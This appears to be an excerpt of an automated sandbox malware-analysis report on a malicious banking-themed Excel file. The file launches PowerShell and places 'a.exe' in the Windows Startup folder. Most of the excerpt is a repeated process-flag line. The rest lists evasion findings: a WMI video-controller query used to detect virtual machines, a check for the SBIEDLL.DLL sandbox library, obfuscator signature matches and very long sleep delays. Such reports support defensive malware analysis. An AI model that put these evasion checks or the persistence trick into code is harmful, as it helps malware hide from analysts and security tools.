Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Process information set: NOOPENFILEERRORBOX
Source: LIQUIDACION INTERBANCARIA 02_22_2021.xls Stream path 'Workbook' entropy: 7.96834669995 (max. 8.0)

Malware Analysis System Evasion:

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: a.exe, 0000000D.00000002.952842213.0000000002DF1000.00000004.00000001.sdmp, a.exe, 00000014.00000002.870308701.0000000002EE1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Yara detected Beds Obfuscator
Source: Yara match File source: 00000011.00000002.876240165.0000000007590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.710604971.0000000003889000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.775905725.0000000003969000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.715456049.0000000006E20000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.854642346.0000000003A89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.789219576.0000000007530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6200, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 6772, type: MEMORY
Source: Yara match File source: Process Memory Space: a.exe PID: 740, type: MEMORY
Source: Yara match File source: 1.2.a.exe.6e20000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.7530000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.3a89990.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.7590000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.3969990.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.2.a.exe.7590000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.6e20000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.a.exe.3889990.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.a.exe.7530000.5.raw.unpack, type: UNPACKEDPE
Contains capabilities to detect virtual machines
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe Thread delayed: delay time: 922337203685477 Jump to behavior
